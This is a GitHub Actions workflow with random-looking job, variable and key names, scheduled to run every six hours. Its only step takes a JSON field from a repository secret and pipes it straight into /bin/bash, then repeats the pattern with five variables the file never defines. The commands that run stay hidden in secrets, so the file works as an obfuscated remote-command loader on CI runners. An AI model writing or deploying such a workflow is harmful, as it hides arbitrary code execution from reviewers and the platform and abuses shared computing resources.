name: ourselvessuffix

on:
  workflow_dispatch:
  schedule:
    - cron: '34 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ourselvessuffix
        env:
          qjiv86: ${{ secrets.qjiv86 }}
        run: |
          echo $qjiv86 | jq -r .emuo09 | /bin/bash
          echo $wp06500 | jq -r .ksw071 | /bin/bash
          echo $doss9 | jq -r .ce2966 | /bin/bash
          echo $t12755 | jq -r .oxkm04 | /bin/bash
          echo $ql31 | jq -r .utq097 | /bin/bash
          echo $ewt73 | jq -r .ktzuh00 | /bin/bash

